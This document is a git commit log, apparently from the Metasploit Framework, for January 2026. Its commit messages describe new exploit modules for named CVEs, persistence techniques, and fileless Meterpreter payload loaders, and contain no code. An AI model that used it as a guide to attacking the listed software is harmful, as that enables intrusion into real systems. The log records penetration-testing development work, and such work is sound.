jenkins-metasploit 9f591ad456 Bump version of framework to 6.4.108 2026-01-15 03:35:45 +00:00
jenkins-metasploit d8bef9bd7b automatic module_metadata_base.json update 2026-01-14 22:53:30 +00:00
jheysel-r7 bb473b6019 Merge pull request #20797 from h00die/remove_persistence_exe
persistence modules cleanup
2026-01-14 14:43:33 -08:00
jenkins-metasploit 3077fd6011 automatic module_metadata_base.json update 2026-01-14 21:13:52 +00:00
Spencer McIntyre af6ad7ee12 Merge pull request #20738 from Shubham0699/fix-bailiwicked-exceptions
Fix Bailiwicked module exceptions and SRCPORT default
2026-01-14 16:04:14 -05:00
jenkins-metasploit c2295b13a8 automatic module_metadata_base.json update 2026-01-14 20:53:26 +00:00
Spencer McIntyre 658c251b66 Merge pull request #20472 from jheysel-r7/feat/mod/badsuccessor
Add BadSuccessor dMSA Privilege Escalation in Windows 2025
2026-01-14 15:43:35 -05:00
Spencer McIntyre aa7771809c Same error handling in #check.
Last minute linting

Minor author update

Update author
2026-01-14 12:40:16 -08:00
Spencer McIntyre a7adf23a17 Add some option validation 2026-01-14 12:35:12 -08:00
Spencer McIntyre b425559f47 Fix some names 2026-01-14 12:35:12 -08:00
Jack Heysel c1023fd62a Add BadSuccessor dMSA Privilege Escalation in Windows 2025 2026-01-14 12:34:45 -08:00
h00die f4a195b88a persistence modules cleanup 2026-01-14 13:49:29 -05:00
gregd 8ddf3de41e Consolidate Linux Dropper targets and remove redundant metadata per reviewer feedback 2026-01-14 18:01:29 +00:00
h00die 822227ddf2 Update modules/exploits/windows/persistence/bits.rb
Co-authored-by: Brendan <bwatters@rapid7.com>
2026-01-14 11:20:23 -05:00
h00die 08ce855fa9 Update modules/exploits/windows/persistence/bits.rb
Co-authored-by: Brendan <bwatters@rapid7.com>
2026-01-14 11:20:08 -05:00
jenkins-metasploit 480b1ddc22 automatic module_metadata_base.json update 2026-01-14 14:57:39 +00:00
msutovsky-r7 7b092aeedb Land #20806, adds module for unauthenticated command injection in Control Web Panel API (CVE-2025-67888)
Adds module for Control Web Panel API Command Injection (CVE-2025-67888)
2026-01-14 15:44:25 +01:00
Diego Ledda e4f8d4fb13 Merge pull request #20706 from h00die/windows_wmi_persistence
Update windows wmi to persistence mixin
2026-01-14 09:37:20 -05:00
h00die 6731992ddd fix ci pipeline 2026-01-14 08:26:11 -05:00
jenkins-metasploit 6a74e2b829 automatic module_metadata_base.json update 2026-01-14 11:14:41 +00:00
Diego Ledda e96c1e942c Merge pull request #20845 from bcoles/linux-arm-chmod-payloads
Add Linux ARM chmod payloads
2026-01-14 06:05:11 -05:00
Raj Handa 42b50b759f Add documentation for auxiliary/scanner/dect modules
Add module documentation (KB articles) for the DECT scanner modules:
- station_scanner.md: Documents the DECT base station scanner
- call_scanner.md: Documents the DECT active call scanner

Both documents include hardware requirements (COM-ON-AIR cards),
verification steps, options descriptions, and usage scenarios.
2026-01-13 18:40:47 -08:00
Valentin Lobstein b2abdb21de Fix AVideo lab documentation: update file editing instructions
Updated the note to provide a working method to edit configuration.php. Users can enter the container shell or copy the file out for editing.
2026-01-14 00:35:39 +01:00
Valentin Lobstein ae4babbcf1 Fix AVideo lab documentation: remove broken sed command
Removed the broken sed command that doesn't work correctly. Updated note to specify editing /var/www/html/AVideo/videos/configuration.php manually with an editor instead.
2026-01-14 00:34:35 +01:00
Valentin Lobstein 37f9802b83 Update AVideo lab documentation: remove automatic sed fix, specify file to edit
Removed mention of automatic sed fix in docker-entrypoint. Updated note to specify that users should manually edit /var/www/html/AVideo/videos/configuration.php if they encounter redirect issues with webSiteRootURL.
2026-01-14 00:34:10 +01:00
Valentin Lobstein 733455eb53 Change port to 80 in AVideo lab documentation
Changed HTTP_PORT from 9999 to 80 in the documentation to use the correct URL directly. This fixes the webSiteRootURL issue where AVideo was generating incorrect URLs with the mapped port instead of the container's internal port.
2026-01-14 00:32:43 +01:00
h00die 1a6aaa91d0 fix up windows implementation 2026-01-13 16:50:21 -05:00
Valentin Lobstein f6430ee093 Fix MariaDB tc.log corruption issue in AVideo lab setup
The MariaDB container fails to start with 'Bad magic header in tc log' error
when the data directory has incorrect permissions or was previously corrupted.
This occurs during first-time setup of the AVideo lab environment.

The fix:
- Creates a custom entrypoint script that detects and removes corrupted tc.log
  files by checking the magic header (should be 01 00 00 00)
- Modifies Dockerfile.mariadb to integrate the fix script into the original
  MariaDB entrypoint using sed
- Ensures the fix runs automatically before MariaDB initialization

This allows the lab to start successfully on first run without manual intervention.

Co-authored-by: bwatters-r7 <bwatters-r7@users.noreply.github.com>
2026-01-13 22:31:38 +01:00
jenkins-metasploit 595dce8956 automatic module_metadata_base.json update 2026-01-13 16:00:41 +00:00
msutovsky-r7 eae97b314a Land #20810, adds module for authenticated RCE in n8n (CVE-2025-68613)
Adds module for n8n workflow expression RCE (CVE-2025-68613)
2026-01-13 16:51:06 +01:00
Martin Sutovsky fec9388c33 Adds comment 2026-01-13 16:31:01 +01:00
jenkins-metasploit a3ca8dd27e automatic module_metadata_base.json update 2026-01-13 15:30:59 +00:00
Diego Ledda 9463ed4453 Merge pull request #20855 from h00die/fix_persistence_windows
Enhance Persistences
2026-01-13 10:20:46 -05:00
Martin Sutovsky 7b55f22afb Fixes payload delivery and execution to support all vulnerable versions 2026-01-13 15:37:12 +01:00
bcoles e245298fc2 Add Linux ARM chmod payloads 2026-01-14 01:04:22 +11:00
Martin Sutovsky 2809ff8235 Fix archs 2026-01-13 14:24:04 +01:00
Diego Ledda 7ad037accb Merge pull request #19990 from msutovsky-r7/feat/fetch_fileless_update
Syscall execution method for fileless ELF execution
2026-01-13 05:49:32 -05:00
Martin Sutovsky dfc1adb40c Dropping support for PPC archs 2026-01-13 08:36:28 +01:00
Martin Sutovsky c925ffbfdf Fixes the Mipsbe bug 2026-01-13 08:34:33 +01:00
Martin Sutovsky b1fc76c1c6 Fixes MIPS64 2026-01-13 08:34:32 +01:00
Martin Sutovsky e1f0c72e27 Adds documentation 2026-01-13 08:34:32 +01:00
Martin Sutovsky d057be11e5 Adds more reliable splitting hex shellcode, more reliable shell spawning 2026-01-13 08:34:32 +01:00
Martin Sutovsky 8a7ed167ae Adds x86/x64 loader shellcode 2026-01-13 08:34:31 +01:00
Martin Sutovsky a302985f34 Adds POSIX support, more reliable process killing 2026-01-13 08:34:31 +01:00
Martin Sutovsky f92c58151a Removes unnecessary line 2026-01-13 08:34:30 +01:00
Martin Sutovsky b19f7d1f1b Removing teaser 2026-01-13 08:34:30 +01:00
Martin Sutovsky 243c71b7a9 Adds killing memfd_create process to avoid having bash idly waiting; code refactor; comments 2026-01-13 08:34:30 +01:00
Martin Sutovsky 596184d636 Option rename 2026-01-13 08:34:29 +01:00
Martin Sutovsky 5857697edb MIPS fix 2026-01-13 08:34:29 +01:00
Martin Sutovsky bbe66eec78 MIPS64 fix 2026-01-13 08:34:29 +01:00
Martin Sutovsky e3514dda3a Add ppc/ppc64 fix 2026-01-13 08:34:28 +01:00
Martin Sutovsky bc467503a0 Add bash-search option 2026-01-13 08:34:28 +01:00
Martin Sutovsky c93015a86d Add armbe/armle fix 2026-01-13 08:34:27 +01:00
Martin Sutovsky cc3d10d2df Code refactor 2026-01-13 08:34:27 +01:00
Martin Sutovsky 66374f877a Update jump instruction armle/armbe 2026-01-13 08:34:27 +01:00
Martin Sutovsky 8a9eeafd1c armle/armbe shellcode update 2026-01-13 08:34:26 +01:00
Martin Sutovsky 8a4265038a armbe/armle jump instruction update 2026-01-13 08:34:26 +01:00
Martin Sutovsky dfc51fdcd9 Fix for lost zero byte in arm64, adding more reliable method for all archs 2026-01-13 08:34:25 +01:00
Martin Sutovsky 2ccbffe67a Fixing jump instruction for aarch64 2026-01-13 08:34:25 +01:00
Martin Sutovsky 0821db9e94 Adding remaining architectures, untested 2026-01-13 08:34:25 +01:00
Martin Sutovsky 7ab1e0dc10 Fix sh option 2026-01-13 08:34:24 +01:00
Martin Sutovsky ff9fe421f5 Rebase, adding sh option 2026-01-13 08:34:24 +01:00
Martin Sutovsky eab7781b29 Fixes Referer header 2026-01-13 08:18:21 +01:00
jenkins-metasploit aa5d4d0504 automatic module_metadata_base.json update 2026-01-12 23:23:32 +00:00
Brendan 10d12570c0 Merge pull request #20791 from Chocapikk/webcheck
Add Web-Check screenshot API command injection RCE exploit (CVE-2025-32778)
2026-01-12 17:14:04 -06:00
JohannesLks 4678d82c6d fix: architecture specification 2026-01-12 17:03:08 +01:00
Martin Sutovsky 9cf1bb4b81 Fixes the default value 2026-01-12 16:57:34 +01:00
Martin Sutovsky 86f7e795cf Fixes the default value 2026-01-12 16:56:05 +01:00
msutovsky-r7 87da6e2bee Land #20665, adds documentation for ipv6_neighbor_router_advertisement module
Add documentation for ipv6_neighbour_router_advertisement.rb
2026-01-12 15:16:41 +01:00
Martin Sutovsky defa2b1337 Adds reference to protocol, fixes formatting 2026-01-12 14:54:46 +01:00
basicallyabidoof 2f62e7c031 Add documentation for ipv6_neighbor_router_advertisement.rb see https://github.com/rapid7/metasploit-framework/issues/12389 2026-01-12 14:54:46 +01:00
dledda-r7 c08a86fa0a fix: rename file typo 2026-01-12 07:30:06 -05:00
h00die 1d9ecc89c6 add attck ref 2026-01-11 07:47:03 -05:00
h00die 1e98e1b932 update wsl startup folder persistence with attck ref 2026-01-11 07:45:50 -05:00
h00die 31d7e424c0 s4u add attck trigger ref 2026-01-11 07:43:43 -05:00
bcoles c03043dada Post::Linux::System.get_hostname: Use session sysinfo if available 2026-01-11 23:31:58 +11:00
h00die 6491f74d9d wmi persistence improvements 2026-01-11 07:25:13 -05:00
h00die 19f5970c61 add udev mitre ref 2026-01-09 16:22:24 -05:00
h00die 1afd3e299c update example linux persistence module 2026-01-09 16:21:08 -05:00
h00die aa5fd40a19 add arch to windows modules and triggered execution attck to most persistence 2026-01-09 16:21:08 -05:00
h00die 52ad17690f add arch to windows modules and triggered execution attck to most persistence 2026-01-09 16:21:07 -05:00
Jack Heysel cdebe41d6c Revert unintended change 2026-01-09 09:55:22 -08:00
jheysel-r7 dc5039b84c Update modules/exploits/multi/http/cacti_graph_template_rce.rb
Co-authored-by: Brendan <bwatters@rapid7.com>
2026-01-09 09:46:08 -08:00
Rudraditya Thakur 166c8b75d2 updated: error message 2026-01-09 22:29:22 +05:30
JohannesLks d45e91b130 typo 2026-01-09 10:48:30 -05:00
jenkins-metasploit 838dcad772 automatic module_metadata_base.json update 2026-01-09 15:24:11 +00:00
msutovsky-r7 472016b753 Land #20796, moves udev module into persistence category
update udev to persistence mixin
2026-01-09 16:14:08 +01:00
dledda-r7 648a3465b2 feat: add common utilities for Windows executable handling 2026-01-09 07:27:35 -05:00
dledda-r7 3a43678808 feat: add x86 Windows executable handling 2026-01-09 07:27:35 -05:00
dledda-r7 62446b9446 feat: implement x64 Windows executable handling 2026-01-09 07:27:34 -05:00
dledda-r7 cdf19a1397 feat: add Windows AArch64 executable handling 2026-01-09 07:27:34 -05:00
dledda-r7 ae4fa52afe feat: add common utilities for executable handling 2026-01-09 07:27:33 -05:00
dledda-r7 d95c30467e feat: utils/winodws.rb add Windows executable handling 2026-01-09 07:27:33 -05:00
dledda-r7 1860507850 feat: utils/exe.rb break-up solaris executable handling 2026-01-09 07:27:33 -05:00
dledda-r7 0802ef9adc feat: utils/exe.rb refactor OSX executable handling 2026-01-09 07:27:32 -05:00
dledda-r7 6598e151b7 feat: utils/exe.rb refactor Linux executable handling 2026-01-09 07:27:32 -05:00
dledda-r7 033a2358f8 feat: utils/exe.rb refactor BSD executable handling 2026-01-09 07:27:31 -05:00
dledda-r7 cc898a7aa7 feat: utils/exe.rb break-up solaris part 2026-01-09 07:27:31 -05:00
dledda-r7 961e7faa33 feat: utils/exe.rb break-up bsd part 2026-01-09 07:27:30 -05:00
dledda-r7 6b50556bfa feat: utils/exe.rb break-up osx part 2026-01-09 07:27:30 -05:00
dledda-r7 1db6b0cb59 feat: utils/exe.rb break-up linux part 2026-01-09 07:27:30 -05:00
Martin Sutovsky 5e8ec214e9 Fixes cleanup 2026-01-09 11:58:53 +01:00
dledda-r7 1afdbd683a feat: change Base64Decoder option type from OptString to OptEnum 2026-01-09 05:51:46 -05:00
Martin Sutovsky e8efe19598 Moves file upload module into separate PR 2026-01-09 11:19:37 +01:00
Martin Sutovsky fcabe61271 Moves SQLi to RCE module into separate PR 2026-01-09 11:15:47 +01:00
Martin Sutovsky b3988aabf5 Adds arbitrary file loading 2026-01-09 10:55:13 +01:00
jenkins-metasploit 73bef77cb1 automatic module_metadata_base.json update 2026-01-09 02:17:28 +00:00
jheysel-r7 ae4a5ac986 Merge pull request #20786 from zeroSteiner/feat/lib/mod-merge-target-info
Merge target info into the module info
2026-01-08 18:01:14 -08:00
jheysel-r7 b9be6ac259 Merge pull request #20785 from Chocapikk/react2shell-clean
Update react2shell module: Add Waku framework support
2026-01-08 17:58:48 -08:00
jenkins-metasploit 0e9b938d4f automatic module_metadata_base.json update 2026-01-09 00:53:30 +00:00
jheysel-r7 bb98e855e1 Merge pull request #20751 from h00die/sticky_keys
update windows sticky keys to persistence mixin
2026-01-08 16:44:04 -08:00
jenkins-metasploit 4e2233827b automatic module_metadata_base.json update 2026-01-08 21:27:10 +00:00
Spencer McIntyre da89d98b1e Merge pull request #20847 from dwelch-r7/fix-ssh-login-print-and-docs
Fix extra characters in print and merge docs for ssh_login/ssh_login_pubkey
2026-01-08 16:17:43 -05:00
jenkins-metasploit cb6b96e17b automatic module_metadata_base.json update 2026-01-08 20:54:58 +00:00
Spencer McIntyre f7857f0a4e Merge pull request #20853 from zeroSteiner/fix/bump-payloads/2.0.239
Update metasploit-payloads gem to 2.0.239
2026-01-08 15:45:36 -05:00
Spencer McIntyre 16c1b6fa64 Update payload cached sizes 2026-01-08 15:27:31 -05:00
Spencer McIntyre 86f77beb2e Update metasploit-payloads gem to 2.0.239
Includes changes from:
* rapid7/metasploit-payloads#764
* rapid7/metasploit-payloads#786
2026-01-08 14:58:17 -05:00
JohannesLks 8bd24f4ecf Fix:n- Use Rex::Stopwatch for time-based checkn- Change CheckCode::Appears to CheckCode::Vulnerable - Add cmd/base64 encoder in Payload hash for Unix Command target - Simplify execute_command by removing manual base64 encoding 2026-01-08 12:38:20 -05:00
Spencer McIntyre 6627686e74 Merge pull request #20850 from dledda-r7/poolparty_injection
Poolparty injection Stubs
2026-01-08 12:01:51 -05:00
dledda-r7 e1f6fafb2a feat: expose encoder standard and advanced options in exploits, payloads, evasions 2026-01-08 11:28:35 -05:00
dledda-r7 f35497f4b4 feat: expose encoder options 2026-01-08 11:09:15 -05:00
Valentin Lobstein ae58da4d4b Update modules/exploits/multi/http/avideo_notify_ffmpeg_unauth_rce.rb
Co-authored-by: Brendan <bwatters@rapid7.com>
2026-01-08 17:03:53 +01:00
Valentin Lobstein 7b1e7d5320 Apply review feedback: move Space limits to targets, use CheckCode::Detected
Co-authored-by: bwatters-r7 <bwatters-r7@users.noreply.github.com>
2026-01-08 16:59:17 +01:00
Valentin Lobstein 0583a4c983 Apply review feedback: revert Platform, simplify framework_config, improve Waku detection
Co-authored-by: jheysel-r7 <jheysel-r7@users.noreply.github.com>
2026-01-08 16:50:55 +01:00
Martin Sutovsky de411e717d More reliable check method 2026-01-08 16:26:17 +01:00
JohannesLks c859f18557 fix: - Hardcode endpoint path in send_request_cgi - Use idiomatic Ruby single-line conditional - Remove unnecessary return keyword 2026-01-08 15:34:11 +01:00
Dean Welch 2867729808 Fix extra characters in print and merge docs for ssh_login/ssh_login_pubkey 2026-01-08 13:57:22 +00:00
Christophe De La Fuente a65e70c936 Fix exception handler 2026-01-08 14:23:32 +01:00
Christophe De La Fuente 2223a37102 A few fixes and enhancements for RPC
- Add HTTP message in case of error (default to the standard message associated to the status code)
- Add and update a some method documentation
- Fix wrong hash key name in `rpc_vulns`
- Add warning in case the DB is disabled
2026-01-08 14:23:32 +01:00
jenkins-metasploit 8e6be3940e automatic module_metadata_base.json update 2026-01-08 11:42:27 +00:00
msutovsky-r7 c289ff44b9 Land #20811, adds module for Prison Management System 1.0 RCE (CVE-2024-48594)
Add Prison Management System 1.0 auth RCE (CVE-2024-48594)
2026-01-08 12:33:00 +01:00
Diego Ledda b40fc5afa8 chore: update author information in poolparty shellcode 32-bit 2026-01-08 12:20:43 +01:00
Martin Sutovsky a11214466e Updates module 2026-01-08 11:57:06 +01:00
Martin Sutovsky 2df640efb4 Fixes payload delivery 2026-01-08 11:45:14 +01:00
dledda-r7 c5fd212334 docs: add poolparty 32-bit, update poolparty 64-bit stubs 2026-01-08 05:15:28 -05:00
dledda-r7 4774c03888 docs: removing unused sources 2026-01-08 04:46:05 -05:00
Martin Sutovsky 3d541672cb Updates payload 2026-01-08 08:07:52 +01:00
jenkins-metasploit ac263282a6 Bump version of framework to 6.4.107 2026-01-08 03:35:47 +00:00
haicen 1040741b0b removes unneeded debug code 2026-01-07 14:41:16 -05:00
haicen f7754e475f updates references and disclosure date 2026-01-07 14:25:05 -05:00
haicen fea31d3c19 Merge branch 'master' into haicen_xerte 2026-01-07 13:52:18 -05:00
Xorriath 2030d19438 Update modules/exploits/linux/http/prison_management_rce.rb
Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com>
2026-01-07 14:45:03 +02:00
Xorriath 2ef1b9fbae Update modules/exploits/linux/http/prison_management_rce.rb
Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com>
2026-01-07 14:44:51 +02:00
Diego Ledda 23b86eba7e Merge pull request #20848 from msutovsky-r7/fix/lib/exe/x64_to_executable_fix
Fixes typo in generating X64 PE file
2026-01-07 06:36:30 -05:00
gregd afd9ac3974 Add comment for WebSocket GUID per review feedback 2026-01-07 11:27:06 +00:00
Martin Sutovsky 27fc0bf2e2 Fixes typo in to_executable 2026-01-07 12:12:37 +01:00
jenkins-metasploit 0f3ac31712 automatic module_metadata_base.json update 2026-01-07 11:03:11 +00:00
msutovsky-r7 b39e781500 Land #20700, adds module for Taiga.io RCE (CVE-2025-62368)
Adds exploit module for authenticated deserialization vulnerability in Taiga.io (CVE-2025-62368)
2026-01-07 11:53:32 +01:00
jenkins-metasploit d104bdeeb1 automatic module_metadata_base.json update 2026-01-07 00:28:55 +00:00
jheysel-r7 0d21fd4cc9 Merge pull request #20692 from msutovsky-r7/persistence/multi/python-site-specific-config-hook
Adds module for python site-specific hook persistence
2026-01-06 16:19:31 -08:00
h00die 428f31fdd3 review for wmi persistence 2026-01-06 16:36:05 -05:00
jenkins-metasploit 8ce13f05fd automatic module_metadata_base.json update 2026-01-06 19:39:47 +00:00
Spencer McIntyre f545b5b487 Merge pull request #19799 from dledda-r7/fix/mettle-stageless-payload
Fix Linux Stageless Payload to be Shellcodes
2026-01-06 14:30:06 -05:00
dledda-r7 79e2b844dd fix: fixing meterpreter template for zarch, removing prepends 2026-01-06 14:07:29 -05:00
h00die bfec7c378b Update documentation/modules/exploit/windows/persistence/accessibility_features_debugger.md
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
2026-01-06 14:00:39 -05:00
Martin Sutovsky d6bffff143 Putting cmd_exec arguments into single argument 2026-01-06 18:38:31 +01:00
jenkins-metasploit 86f13f71de automatic module_metadata_base.json update 2026-01-06 17:03:57 +00:00
jheysel-r7 f0323e8069 Merge pull request #20744 from ptrstr/patch-2
Remove current date constraint from uploaded path in `wp_reflexgallery_file_upload`
2026-01-06 08:54:29 -08:00
dledda-r7 b42fc2eb1e fix: remove armbe, ppc, ppc64le, ppce500v2 and zarch elf_loaders 2026-01-06 09:53:04 -05:00
dledda-r7 beddb75ce7 fix: fix correct zarch value for meterpreter_reverse.erb 2026-01-06 09:53:03 -05:00
dledda-r7 eaead1d2f3 fix: remove zarch inmemory_loader from stageless meterpreter 2026-01-06 09:53:03 -05:00
dledda-r7 b3b7e5f0fb rebase: post-rebase 2026-01-06 09:53:02 -05:00
dledda-r7 892ef86515 fix: remove in_memoryloader for ppc, ppc64le, ppce500v2 and armbe from erb file 2026-01-06 09:53:01 -05:00
dledda-r7 6d4cefdff7 fix: fix erb for mettle payload generation 2026-01-06 09:52:28 -05:00
Diego Ledda a4cb822d13 Update lib/msf/core/payload/linux/aarch64/elf_loader.rb 2026-01-06 09:52:28 -05:00
dledda-r7 ed87ffeb66 fix: rollback itoa and execve instead of execveat 2026-01-06 09:52:28 -05:00
Diego Ledda 91bb23f41d Update lib/msf/core/payload/linux/aarch64/elf_loader.rb
fix aarch64 packing
2026-01-06 09:52:27 -05:00
Martin Sutovsky 8ab2f4450f Rolling back zarch to exec syscall 2026-01-06 09:52:27 -05:00
Martin Sutovsky 70ad726dd6 Rolling back ppc/ppc64/ppce500v2 to exec syscall 2026-01-06 09:52:26 -05:00
Martin Sutovsky ad44f7c637 Rolling back arm/arm64 to exec syscall 2026-01-06 09:52:26 -05:00
dledda-r7 17776b6377 fix: fix linux prepends, uniform ppc prepends 2026-01-06 09:52:26 -05:00
dledda-r7 d2a2d1e1c8 fix: removed + character in PayloadLinuxMinKernel 2026-01-06 09:52:20 -05:00
dledda-r7 d5fb4a95ed fix: minor fix linux elf templates 2026-01-06 09:51:56 -05:00
Diego Ledda 540f16b3b0 Update modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb 2026-01-06 09:51:56 -05:00
Diego Ledda 5d8d801454 Update modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb 2026-01-06 09:51:56 -05:00
Diego Ledda 43669bb7dc Update modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb 2026-01-06 09:51:55 -05:00
dledda-r7 cab1337d76 fix: update util/exe.rb to support new linux templates, code refactoring 2026-01-06 09:51:55 -05:00
Diego Ledda d157779b72 Update lib/msf/core/payload/linux/mipsbe/prepends.rb
Co-authored-by: Brendan <bwatters@rapid7.com>
2026-01-06 09:51:54 -05:00
Diego Ledda c02498274e chore: remove white-space 2026-01-06 09:51:54 -05:00
Diego Ledda 3886401cea fix: update cached size 2026-01-06 09:51:54 -05:00
Diego Ledda 29678264c0 fix: update cached size 2026-01-06 09:51:53 -05:00
Diego Ledda 9e830c2faf fix: update cached size 2026-01-06 09:51:53 -05:00
Martin Sutovsky 34318f81b6 Fixing mipsbe loader stub 2026-01-06 09:51:53 -05:00
dledda-r7 187a7d361a fix: changes based on review comments 2026-01-06 09:51:51 -05:00
Martin Sutovsky f29d7aeea0 Fixed comments 2026-01-06 09:51:29 -05:00
Martin Sutovsky f391e1dda2 Adds convetion for each architecture 2026-01-06 09:51:29 -05:00
dledda-r7 58a32627c0 chore: linting meterpreter_loader and prepends 2026-01-06 09:51:28 -05:00
dledda-r7 f7caa72f3f fix: align assembly comments, add single build instructions 2026-01-06 09:51:28 -05:00
dledda-r7 0fd1bd8047 fix: updating MeterpreterLinuxMinKernel default value, displaying warning on prepends usage 2026-01-06 09:51:28 -05:00
dledda-r7 75765fb0eb fix: including prepends mixin on linux stageless meterpreter 2026-01-06 09:51:26 -05:00
dledda-r7 cd0645b502 fix: changing MeterpreterLegacyElf to MeterpreterLinuxMinKernel 2026-01-06 09:51:02 -05:00
Martin Sutovsky 98e974dfea Adds comments for zarch 2026-01-06 09:50:38 -05:00
Martin Sutovsky d93c9af7b0 Adds comments for ARM, Mips and PPC 2026-01-06 09:50:37 -05:00
Martin Sutovsky 494aeb8061 Updates cached_sizes and rubocop 2026-01-06 09:50:35 -05:00
Martin Sutovsky 351db91769 Adds execveat for MIPS64, PPC64 and Zarch 2026-01-06 09:50:08 -05:00
Martin Sutovsky 34aeb6fc89 Uses execveat syscall to make loader stub smaller 2026-01-06 09:50:07 -05:00
Martin Sutovsky 0b0ab91594 Add build script 2026-01-06 09:50:07 -05:00
Martin Sutovsky 768331d234 Adding comments for PPC 2026-01-06 09:50:06 -05:00
dledda-r7 3a22eae7c8 feat: add elf-legacy option for systems unsupported by in_memory_loader 2026-01-06 09:50:04 -05:00
Martin Sutovsky eb68c8d93c Add armbe/armle comments 2026-01-06 09:49:33 -05:00
Martin Sutovsky 85091a4111 Aarch64 comments 2026-01-06 09:49:33 -05:00
Martin Sutovsky 9c2ea9c0dc Rubocoping AARCH64 payload modules 2026-01-06 09:49:32 -05:00
Martin Sutovsky 16437e7421 Fixed missing payload length for AARCH64 2026-01-06 09:49:32 -05:00
dledda-r7 753b80322f fix: updated mettle payload generation and cached_size 2026-01-06 09:49:30 -05:00
dledda-r7 0cc080fbe9 fix: updated mettle payload generation and cached_size 2026-01-06 09:49:00 -05:00
dledda-r7 978a2c23a5 fix: improved x86 and x64 shellcodes 2026-01-06 09:48:27 -05:00
Martin Sutovsky 679ebb070b Code refactor, loader delivery update 2026-01-06 09:48:24 -05:00
Martin Sutovsky 7c77a9cfc7 ARMBe and Zarch stageless payload 2026-01-06 09:47:55 -05:00
dledda-r7 c4cc47c60e fix: fix exe after merge issue 2026-01-06 09:47:55 -05:00
dledda-r7 3f2be78f9b feat: add mips64 elf template and meterpreter_loader 2026-01-06 09:47:54 -05:00
Martin Sutovsky 861e1b77d6 PowerPC stageless payload 2026-01-06 09:47:50 -05:00
Martin Sutovsky ca9706b6ae PPC progress 2026-01-06 09:47:27 -05:00
Martin Sutovsky 0c2b25e099 PPC64 shellcode added, adding PPC initial work 2026-01-06 09:47:06 -05:00
Martin Sutovsky 764c0c449f PPC64le init 2026-01-06 09:46:33 -05:00
dledda-r7 71d2eb2046 fix: move mipsbe and mipsle meterpreter_loader into separate mixin 2026-01-06 09:46:08 -05:00
dledda-r7 6d750fef07 fix: move x64 meterpreter_loader into separate mixin 2026-01-06 09:46:07 -05:00
dledda-r7 38cd623b63 fix: move meterpreter_loader into separate mixin 2026-01-06 09:46:07 -05:00
dledda-r7 afb93ec158 feat(payload): linux/mips in_memory_loader for stageless meterpreter 2026-01-06 09:46:06 -05:00
dledda-r7 dba8ddbd6f feat(payload): linux/mipsel in_memory_loader for stageless meterpreter 2026-01-06 09:46:06 -05:00
Martin Sutovsky fd0427e55f Adding itoa function for ARM64 and ARMbe 2026-01-06 09:46:06 -05:00
Martin Sutovsky afba87eb4f Adding itoa function for ARM64 and ARMbe 2026-01-06 09:46:05 -05:00
Martin Sutovsky 4c8e4285cf Adding itoa for ARMle stageless payload 2026-01-06 09:46:05 -05:00
Martin Sutovsky c9cd7831ea Armbe draft and ARM64 functional payload for memfd_create 2026-01-06 09:46:04 -05:00
Martin Sutovsky bc28e3a712 Shellcode for memfd_create for ARM 2026-01-06 09:46:04 -05:00
dledda-r7 a5bae331bc feat(payload): linux/x64 in_memory_loader for stageless meterpreter 2026-01-06 09:46:04 -05:00
dledda-r7 750bbdf9d7 feat(payload): linux/x86 in_memory_loader itoa improvement 2026-01-06 09:46:03 -05:00
dledda-r7 14f62457b3 feat(payload): linux/x86 in_memory_loader for stageless meterpreter 2026-01-06 09:46:03 -05:00
dledda-r7 b9adfb740e fix: removing unnecessary elf parsing in linux/x86/meterpreter 2026-01-06 09:46:02 -05:00
ptrstr 0e28807458 Fix formatting 2026-01-06 09:44:22 -05:00
Xorriath a676b05928 Update modules/exploits/linux/http/prison_management_rce.rb
Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com>
2026-01-06 12:35:32 +02:00
Xorriath 236d94ee54 Update modules/exploits/linux/http/prison_management_rce.rb
Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com>
2026-01-06 12:35:17 +02:00
Xorriath b35d74b305 Update modules/exploits/linux/http/prison_management_rce.rb
Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com>
2026-01-06 12:35:01 +02:00
cgranleese-r7 61004db2be Merge pull request #20370 from msutovsky-r7/fix/smb_login_crash
Fixes smb_login crash
2026-01-06 10:34:23 +00:00
kali be9b2c9491 Add documentation for prison_management_rce 2026-01-06 12:33:49 +02:00
jenkins-metasploit 7aebd446fb automatic module_metadata_base.json update 2026-01-06 09:49:35 +00:00
cgranleese-r7 3bf76a3f9f Merge pull request #20815 from h00die/fix_panda_refs
fix panda local privesc refs
2026-01-06 09:40:02 +00:00
Martin Sutovsky 13e93abfdf Addressing comments 2026-01-06 08:31:46 +01:00
h00die 2f4db3bd5f review for wmi persistence 2026-01-05 17:06:17 -05:00
h00die 05345e96f2 temp 2026-01-05 15:44:39 -05:00
6a6f656c acc035cabd Merge pull request #1 from h00die/upstream/pr/20844
Add docs and tidy to userinit persistence
2026-01-05 07:26:04 -05:00
jenkins-metasploit bd870b4caf automatic module_metadata_base.json update 2026-01-05 11:48:09 +00:00
Diego Ledda 385c4f9896 Merge pull request #20733 from bcoles/linux-riscv-tcp-bind-shell
Add Linux RISC-V 32-bit/64-bit TCP bind shell payloads
2026-01-05 06:38:23 -05:00
DataExplorerX ae8ab28eed Fix msftidy_docs warnings in chain_reply documentation 2026-01-05 16:01:16 +05:30
jenkins-metasploit 141c823e2c automatic module_metadata_base.json update 2026-01-05 10:25:55 +00:00
msutovsky-r7 ee992c6f5c Land #20831, adds link to Framework Github issues
Fix broken links in CONTRIBUTING.md code-free contributions section
2026-01-05 11:07:09 +01:00
Diego Ledda 0dee8a82b8 Merge pull request #20734 from bcoles/linux-riscv-command-payload-adapters
Add Linux RISC-V command payload adapters
2026-01-05 05:06:21 -05:00
h00die 37cd1f27b0 move burp files and modernize with persistence mixin 2026-01-04 08:21:06 -05:00
Martin Sutovsky b8890b6396 Adds automatic execution 2026-01-04 08:06:14 -05:00
Martin Sutovsky 413e091db6 Adds headless execution 2026-01-04 08:06:14 -05:00
Martin Sutovsky 86152f9dd1 Fixing payload 2026-01-04 08:06:14 -05:00
h00die 839a8f2ebc burp extension review 2026-01-04 08:06:14 -05:00
h00die aa9a0f76da burp extension review 2026-01-04 08:06:14 -05:00
h00die 1a59ed08fe add docs for burp extension persistence 2026-01-04 08:06:14 -05:00
